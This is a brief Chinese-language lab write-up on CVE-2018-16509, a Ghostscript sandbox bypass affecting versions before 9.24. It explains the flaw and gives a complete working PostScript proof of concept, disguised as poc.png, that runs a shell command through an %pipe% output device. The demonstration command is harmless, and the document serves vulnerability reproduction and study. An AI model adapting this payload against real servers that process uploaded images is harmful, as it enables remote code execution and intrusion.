CVE-2018-16509 GhostScript 沙箱绕过(命令执行)漏洞¶
一、漏洞简介¶
该漏洞源于在处理/invalidaccess异常时,程序没有正确的检测‘restoration of privilege(权限恢复)’
。攻击者可通过提交特制的PostScript利用该漏洞执行代码。
二、漏洞影响¶
Ghostscript 9.24之前版本
三、复现过程¶
上传poc.png,将执行命令id > /tmp/success && cat /tmp/success
。此时进入容器docker-compose exec web bash,将可以看到/tmp/success已被创建:
poc.png
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
参考链接
https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/